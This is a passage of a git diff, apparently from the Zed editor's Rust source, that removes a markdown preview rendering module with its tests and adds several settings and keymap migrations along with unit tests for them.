util::truncate_and_trailoff(&t, 50).into()); - - cx.new(|_cx| Self { - tooltip_text, - action_text: action_text.into(), - }) - } -} - -impl Render for InteractiveMarkdownElementTooltip { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - tooltip_container(cx, |el, _| { - let secondary_modifier = Keystroke { - modifiers: Modifiers::secondary_key(), - ..Default::default() - }; - - el.child( - v_flex() - .gap_1() - 
.when_some(self.tooltip_text.clone(), |this, text| { - this.child(Label::new(text).size(LabelSize::Small)) - }) - .child( - Label::new(format!( - "{}-click to {}", - secondary_modifier, self.action_text - )) - .size(LabelSize::Small) - .color(Color::Muted), - ), - ) - }) - } -} - -/// Returns the prefix for a list item. -fn list_item_prefix(order: usize, ordered: bool, depth: usize) -> String { - let ix = order.saturating_sub(1); - const NUMBERED_PREFIXES_1: &str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; - const NUMBERED_PREFIXES_2: &str = "abcdefghijklmnopqrstuvwxyz"; - const BULLETS: [&str; 5] = ["•", "◦", "▪", "‣", "⁃"]; - - if ordered { - match depth { - 0 => format!("{}. ", order), - 1 => format!( - "{}. ", - NUMBERED_PREFIXES_1 - .chars() - .nth(ix % NUMBERED_PREFIXES_1.len()) - .unwrap() - ), - _ => format!( - "{}. ", - NUMBERED_PREFIXES_2 - .chars() - .nth(ix % NUMBERED_PREFIXES_2.len()) - .unwrap() - ), - } - } else { - let depth = depth.min(BULLETS.len() - 1); - let bullet = BULLETS[depth]; - return format!("{} ", bullet); - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::markdown_elements::ParsedMarkdownMermaidDiagramContents; - use crate::markdown_elements::ParsedMarkdownTableColumn; - use crate::markdown_elements::ParsedMarkdownText; - - fn text(text: &str) -> MarkdownParagraphChunk { - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..text.len(), - contents: SharedString::new(text), - highlights: Default::default(), - regions: Default::default(), - }) - } - - fn column( - col_span: usize, - row_span: usize, - children: Vec, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header: false, - children, - alignment: ParsedMarkdownTableAlignment::None, - } - } - - fn column_with_row_span( - col_span: usize, - row_span: usize, - children: Vec, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header: false, - children, - alignment: 
ParsedMarkdownTableAlignment::None, - } - } - - #[test] - fn test_calculate_table_columns_count() { - assert_eq!(0, calculate_table_columns_count(&vec![])); - - assert_eq!( - 1, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]) - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(2, 1, vec![text("column1")]) - ])]) - ); - - assert_eq!( - 3, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(2, 1, vec![text("column2")]), - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![column(1, 1, vec![text("column1")]),]) - ]) - ); - - assert_eq!( - 3, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![column(3, 3, vec![text("column1")]),]) - ]) - ); - } - - #[test] - fn test_row_span_support() { - assert_eq!( - 3, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column_with_row_span(1, 2, vec![text("spans 2 rows")]), - column(1, 1, vec![text("column2")]), - column(1, 1, vec![text("column3")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column is covered by row span from above - column(1, 1, vec![text("column2 row2")]), - column(1, 1, vec![text("column3 row2")]), - ]) - ]) - ); - - assert_eq!( - 4, - calculate_table_columns_count(&vec![ - 
ParsedMarkdownTableRow::with_columns(vec![ - column_with_row_span(1, 3, vec![text("spans 3 rows")]), - column_with_row_span(2, 1, vec![text("spans 2 cols")]), - column(1, 1, vec![text("column4")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column covered by row span - column(1, 1, vec![text("column2")]), - column(1, 1, vec![text("column3")]), - column(1, 1, vec![text("column4")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column still covered by row span - column(3, 1, vec![text("spans 3 cols")]), - ]) - ]) - ); - } - - #[test] - fn test_list_item_prefix() { - assert_eq!(list_item_prefix(1, true, 0), "1. "); - assert_eq!(list_item_prefix(2, true, 0), "2. "); - assert_eq!(list_item_prefix(3, true, 0), "3. "); - assert_eq!(list_item_prefix(11, true, 0), "11. "); - assert_eq!(list_item_prefix(1, true, 1), "A. "); - assert_eq!(list_item_prefix(2, true, 1), "B. "); - assert_eq!(list_item_prefix(3, true, 1), "C. "); - assert_eq!(list_item_prefix(1, true, 2), "a. "); - assert_eq!(list_item_prefix(2, true, 2), "b. "); - assert_eq!(list_item_prefix(7, true, 2), "g. "); - assert_eq!(list_item_prefix(1, true, 1), "A. "); - assert_eq!(list_item_prefix(1, true, 2), "a. 
"); - assert_eq!(list_item_prefix(1, false, 0), "• "); - assert_eq!(list_item_prefix(1, false, 1), "◦ "); - assert_eq!(list_item_prefix(1, false, 2), "▪ "); - assert_eq!(list_item_prefix(1, false, 3), "‣ "); - assert_eq!(list_item_prefix(1, false, 4), "⁃ "); - } - - fn mermaid_contents(s: &str) -> ParsedMarkdownMermaidDiagramContents { - ParsedMarkdownMermaidDiagramContents { - contents: SharedString::from(s.to_string()), - scale: 1, - } - } - - fn mermaid_sequence(diagrams: &[&str]) -> Vec { - diagrams - .iter() - .map(|diagram| mermaid_contents(diagram)) - .collect() - } - - fn mermaid_fallback( - new_diagram: &str, - new_full_order: &[ParsedMarkdownMermaidDiagramContents], - old_full_order: &[ParsedMarkdownMermaidDiagramContents], - cache: &MermaidDiagramCache, - ) -> Option> { - let new_content = mermaid_contents(new_diagram); - let idx = new_full_order - .iter() - .position(|content| content == &new_content)?; - MermaidState::get_fallback_image(idx, old_full_order, new_full_order.len(), cache) - } - - fn mock_render_image() -> Arc { - Arc::new(RenderImage::new(Vec::new())) - } - - #[test] - fn test_mermaid_fallback_on_edit() { - let old_full_order = mermaid_sequence(&["graph A", "graph B", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); - - let svg_b = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph B"), - CachedMermaidDiagram::new_for_test(Some(svg_b.clone()), None), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = - mermaid_fallback("graph B modified", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing" - ); - assert!( - 
Arc::ptr_eq(&fallback.unwrap(), &svg_b), - "Fallback should be the old diagram's SVG" - ); - } - - #[test] - fn test_mermaid_no_fallback_on_add_in_middle() { - let old_full_order = mermaid_sequence(&["graph A", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph NEW", "graph C"]); - - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph NEW", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_none(), - "Should NOT use fallback when adding new diagram" - ); - } - - #[test] - fn test_mermaid_fallback_chains_on_rapid_edits() { - let old_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B modified again", "graph C"]); - - let original_svg = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph B modified"), - // Still rendering, but has fallback from original "graph B" - CachedMermaidDiagram::new_for_test(None, Some(original_svg.clone())), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback( - "graph B modified again", - &new_full_order, - &old_full_order, - &cache, - ); - - assert!( - fallback.is_some(), - "Should chain fallback when previous render not complete" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &original_svg), - "Fallback should chain through to the original SVG" - ); - } - - #[test] - fn 
test_mermaid_no_fallback_when_no_old_diagram_at_index() { - let old_full_order = mermaid_sequence(&["graph A"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B"]); - - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph B", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_none(), - "Should NOT have fallback when adding diagram at end" - ); - } - - #[test] - fn test_mermaid_fallback_with_duplicate_blocks_edit_first() { - let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); - let new_full_order = mermaid_sequence(&["graph A edited", "graph A", "graph B"]); - - let svg_a = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(svg_a.clone()), None), - ); - cache.insert( - mermaid_contents("graph B"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing one of duplicate blocks" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &svg_a), - "Fallback should be the old duplicate diagram's image" - ); - } - - #[test] - fn test_mermaid_fallback_with_duplicate_blocks_edit_second() { - let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); - let new_full_order = mermaid_sequence(&["graph A", "graph A edited", "graph B"]); - - let svg_a = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(svg_a.clone()), None), - ); - cache.insert( - mermaid_contents("graph B"), - 
CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing the second duplicate block" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &svg_a), - "Fallback should be the old duplicate diagram's image" - ); - } -} diff --git a/crates/migrator/src/migrations.rs b/crates/migrator/src/migrations.rs index d10116be6032486c92d9f27afcf922178463e151..625bd27e91e117662f9a47edaaac2ddaa7d2ba1c 100644 --- a/crates/migrator/src/migrations.rs +++ b/crates/migrator/src/migrations.rs @@ -275,6 +275,12 @@ pub(crate) mod m_2025_12_15 { pub(crate) use settings::SETTINGS_PATTERNS; } +pub(crate) mod m_2025_01_27 { + mod settings; + + pub(crate) use settings::make_auto_indent_an_enum; +} + pub(crate) mod m_2026_02_02 { mod settings; @@ -298,3 +304,27 @@ pub(crate) mod m_2026_02_25 { pub(crate) use settings::migrate_builtin_agent_servers_to_registry; } + +pub(crate) mod m_2026_03_16 { + mod settings; + + pub(crate) use settings::SETTINGS_PATTERNS; +} + +pub(crate) mod m_2026_03_23 { + mod keymap; + + pub(crate) use keymap::KEYMAP_PATTERNS; +} + +pub(crate) mod m_2026_03_30 { + mod settings; + + pub(crate) use settings::make_play_sound_when_agent_done_an_enum; +} + +pub(crate) mod m_2026_04_01 { + mod settings; + + pub(crate) use settings::restructure_profiles_with_settings_key; +} diff --git a/crates/migrator/src/migrations/m_2025_01_27/settings.rs b/crates/migrator/src/migrations/m_2025_01_27/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..e8df2aa8aabed4daaae3e45e97532c1ce3557dfe --- /dev/null +++ b/crates/migrator/src/migrations/m_2025_01_27/settings.rs @@ -0,0 +1,27 @@ +use anyhow::Result; +use serde_json::Value; + +use crate::migrations::migrate_language_setting; + +pub fn make_auto_indent_an_enum(value: &mut Value) -> Result<()> { + 
migrate_language_setting(value, migrate_auto_indent) +} + +fn migrate_auto_indent(value: &mut Value, _path: &[&str]) -> Result<()> { + let Some(auto_indent) = value + .as_object_mut() + .and_then(|obj| obj.get_mut("auto_indent")) + else { + return Ok(()); + }; + + *auto_indent = match auto_indent { + Value::Bool(true) => Value::String("syntax_aware".to_string()), + Value::Bool(false) => Value::String("none".to_string()), + Value::String(s) if s == "syntax_aware" || s == "preserve_indent" || s == "none" => { + return Ok(()); + } + _ => anyhow::bail!("Expected auto_indent to be a boolean or valid enum value"), + }; + Ok(()) +} diff --git a/crates/migrator/src/migrations/m_2026_03_16/settings.rs b/crates/migrator/src/migrations/m_2026_03_16/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..203d29df904d110d8c7b5ffdb257bb28d3eee601 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_16/settings.rs @@ -0,0 +1,50 @@ +use std::ops::Range; +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; +use crate::patterns::SETTINGS_NESTED_KEY_VALUE_PATTERN; + +pub const SETTINGS_PATTERNS: MigrationPatterns = + &[(SETTINGS_NESTED_KEY_VALUE_PATTERN, rename_heex_settings)]; + +fn rename_heex_settings( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + if !is_heex_settings(contents, mat, query) { + return None; + } + + let setting_name_ix = query.capture_index_for_name("setting_name")?; + let setting_name_range = mat + .nodes_for_capture_index(setting_name_ix) + .next()? 
+ .byte_range(); + + Some((setting_name_range, "HEEx".to_string())) +} + +fn is_heex_settings(contents: &str, mat: &QueryMatch, query: &Query) -> bool { + let parent_key_ix = match query.capture_index_for_name("parent_key") { + Some(ix) => ix, + None => return false, + }; + let parent_range = match mat.nodes_for_capture_index(parent_key_ix).next() { + Some(node) => node.byte_range(), + None => return false, + }; + if contents.get(parent_range) != Some("languages") { + return false; + } + + let setting_name_ix = match query.capture_index_for_name("setting_name") { + Some(ix) => ix, + None => return false, + }; + let setting_name_range = match mat.nodes_for_capture_index(setting_name_ix).next() { + Some(node) => node.byte_range(), + None => return false, + }; + contents.get(setting_name_range) == Some("HEEX") +} diff --git a/crates/migrator/src/migrations/m_2026_03_23/keymap.rs b/crates/migrator/src/migrations/m_2026_03_23/keymap.rs new file mode 100644 index 0000000000000000000000000000000000000000..8fadc8201a0d2846e66ddf0de80275732d701acd --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_23/keymap.rs @@ -0,0 +1,47 @@ +use std::ops::Range; + +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; + +pub const KEYMAP_PATTERNS: MigrationPatterns = + &[(crate::patterns::KEYMAP_CONTEXT_PATTERN, rename_context_key)]; + +fn rename_context_key( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + let context_predicate_ix = query.capture_index_for_name("context_predicate")?; + let context_predicate_range = mat + .nodes_for_capture_index(context_predicate_ix) + .next()? 
+ .byte_range(); + let old_predicate = contents.get(context_predicate_range.clone())?.to_string(); + let mut new_predicate = old_predicate.clone(); + + const REPLACEMENTS: &[(&str, &str)] = &[ + ( + "edit_prediction_conflict && !showing_completions", + "(edit_prediction && in_leading_whitespace)", + ), + ( + "edit_prediction_conflict && showing_completions", + "(edit_prediction && showing_completions)", + ), + ( + "edit_prediction_conflict", + "(edit_prediction && (showing_completions || in_leading_whitespace))", + ), + ]; + + for (old, new) in REPLACEMENTS { + new_predicate = new_predicate.replace(old, new); + } + + if new_predicate != old_predicate { + Some((context_predicate_range, new_predicate)) + } else { + None + } +} diff --git a/crates/migrator/src/migrations/m_2026_03_30/settings.rs b/crates/migrator/src/migrations/m_2026_03_30/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..598941a6212442a4562814d43df6184e4eb76640 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_30/settings.rs @@ -0,0 +1,29 @@ +use anyhow::Result; +use serde_json::Value; + +use crate::migrations::migrate_settings; + +pub fn make_play_sound_when_agent_done_an_enum(value: &mut Value) -> Result<()> { + migrate_settings(value, &mut migrate_one) +} + +fn migrate_one(obj: &mut serde_json::Map) -> Result<()> { + let Some(play_sound) = obj + .get_mut("agent") + .and_then(|agent| agent.as_object_mut()) + .and_then(|agent| agent.get_mut("play_sound_when_agent_done")) + else { + return Ok(()); + }; + + *play_sound = match play_sound { + Value::Bool(true) => Value::String("always".to_string()), + Value::Bool(false) => Value::String("never".to_string()), + Value::String(s) if s == "never" || s == "when_hidden" || s == "always" => return Ok(()), + _ => { + anyhow::bail!("Expected play_sound_when_agent_done to be a boolean or valid enum value") + } + }; + + Ok(()) +} diff --git a/crates/migrator/src/migrations/m_2026_04_01/settings.rs 
b/crates/migrator/src/migrations/m_2026_04_01/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..240572fa7754e29d43b23f178115878a99760729 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_04_01/settings.rs @@ -0,0 +1,29 @@ +use anyhow::Result; +use serde_json::Value; + +pub fn restructure_profiles_with_settings_key(value: &mut Value) -> Result<()> { + let Some(root_object) = value.as_object_mut() else { + return Ok(()); + }; + + let Some(profiles) = root_object.get_mut("profiles") else { + return Ok(()); + }; + + let Some(profiles_map) = profiles.as_object_mut() else { + return Ok(()); + }; + + for profile_value in profiles_map.values_mut() { + if profile_value + .as_object() + .is_some_and(|m| m.contains_key("settings") || m.contains_key("base")) + { + continue; + } + + *profile_value = serde_json::json!({ "settings": profile_value }); + } + + Ok(()) +} diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index 8b501020a559c74d81c5ad5b37e1adf60a964927..f49d102213c446be17c7d240d272cf4b516d912c 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -143,6 +143,10 @@ pub fn migrate_keymap(text: &str) -> Result> { migrations::m_2025_12_08::KEYMAP_PATTERNS, &KEYMAP_QUERY_2025_12_08, ), + MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + ), ]; run_migrations(text, migrations) } @@ -232,12 +236,19 @@ pub fn migrate_settings(text: &str) -> Result> { migrations::m_2025_12_15::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_12_15, ), + MigrationType::Json(migrations::m_2025_01_27::make_auto_indent_an_enum), MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, ), MigrationType::Json(migrations::m_2026_02_03::migrate_experimental_sweep_mercury), MigrationType::Json(migrations::m_2026_02_04::migrate_tool_permission_defaults), 
MigrationType::Json(migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry), + MigrationType::TreeSitter( + migrations::m_2026_03_16::SETTINGS_PATTERNS, + &SETTINGS_QUERY_2026_03_16, + ), + MigrationType::Json(migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum), + MigrationType::Json(migrations::m_2026_04_01::restructure_profiles_with_settings_key), ]; run_migrations(text, migrations) } @@ -372,6 +383,14 @@ define_query!( SETTINGS_QUERY_2025_12_15, migrations::m_2025_12_15::SETTINGS_PATTERNS ); +define_query!( + SETTINGS_QUERY_2026_03_16, + migrations::m_2026_03_16::SETTINGS_PATTERNS +); +define_query!( + KEYMAP_QUERY_2026_03_23, + migrations::m_2026_03_23::KEYMAP_PATTERNS +); // custom query static EDIT_PREDICTION_SETTINGS_MIGRATION_QUERY: LazyLock = LazyLock::new(|| { @@ -399,6 +418,7 @@ mod tests { } } + #[track_caller] fn assert_migrate_keymap(input: &str, output: Option<&str>) { let migrated = migrate_keymap(input).unwrap(); pretty_assertions::assert_eq!(migrated.as_deref(), output); @@ -417,7 +437,7 @@ mod tests { } #[track_caller] - fn assert_migrate_settings_with_migrations( + fn assert_migrate_with_migrations( migrations: &[MigrationType], input: &str, output: Option<&str>, @@ -965,7 +985,7 @@ mod tests { #[test] fn test_mcp_settings_migration() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_06_16::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_06_16, @@ -1154,7 +1174,7 @@ mod tests { } } }"#; - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_06_16::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_06_16, @@ -1166,7 +1186,7 @@ mod tests { #[test] fn test_custom_agent_server_settings_migration() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_11_20::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_11_20, @@ -1382,7 +1402,7 @@ 
mod tests { #[test] fn test_flatten_code_action_formatters_basic_array() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1416,7 +1436,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_basic_object() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1573,7 +1593,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_array_with_multiple_action_blocks_in_defaults_and_multiple_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1699,7 +1719,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_array_with_format_on_save_and_multiple_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1886,7 +1906,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_basic() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1906,7 +1926,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_array() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1931,7 +1951,7 @@ mod tests { #[test] fn test_format_on_save_on_off_unchanged() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1942,7 +1962,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( 
&[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1956,7 +1976,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_in_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1994,7 +2014,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_mixed_global_and_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -2031,7 +2051,7 @@ mod tests { #[test] fn test_format_on_save_no_migration_when_no_format_on_save() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -2045,7 +2065,7 @@ mod tests { #[test] fn test_restore_code_actions_on_format() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2066,7 +2086,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2080,7 +2100,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2107,7 +2127,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2136,7 +2156,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2154,7 +2174,7 @@ mod tests { #[test] fn 
test_make_file_finder_include_ignored_an_enum() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2162,7 +2182,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2182,7 +2202,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2202,7 +2222,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2223,7 +2243,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2252,7 +2272,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2287,7 +2307,7 @@ mod tests { #[test] fn test_make_relative_line_numbers_an_enum() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2295,7 +2315,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2311,7 +2331,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( 
&[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2328,7 +2348,7 @@ mod tests { ); // Platform key: settings nested inside "macos" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2353,7 +2373,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2382,6 +2402,132 @@ mod tests { ); } + #[test] + fn test_make_play_sound_when_agent_done_an_enum() { + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ }"#.unindent(), + None, + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": true + } + }"# + .unindent(), + Some( + &r#"{ + "agent": { + "play_sound_when_agent_done": "always" + } + }"# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": false + } + }"# + .unindent(), + Some( + &r#"{ + "agent": { + "play_sound_when_agent_done": "never" + } + }"# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": "when_hidden" + } + }"# + .unindent(), + None, + ); + + // Platform key: settings nested inside "macos" should be migrated + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + 
&r#" + { + "macos": { + "agent": { + "play_sound_when_agent_done": true + } + } + } + "# + .unindent(), + Some( + &r#" + { + "macos": { + "agent": { + "play_sound_when_agent_done": "always" + } + } + } + "# + .unindent(), + ), + ); + + // Profile: settings nested inside profiles should be migrated + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#" + { + "profiles": { + "work": { + "agent": { + "play_sound_when_agent_done": false + } + } + } + } + "# + .unindent(), + Some( + &r#" + { + "profiles": { + "work": { + "agent": { + "play_sound_when_agent_done": "never" + } + } + } + } + "# + .unindent(), + ), + ); + } + #[test] fn test_remove_context_server_source() { assert_migrate_settings( @@ -2430,7 +2576,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_11_25::remove_context_server_source, )], @@ -2468,7 +2614,7 @@ 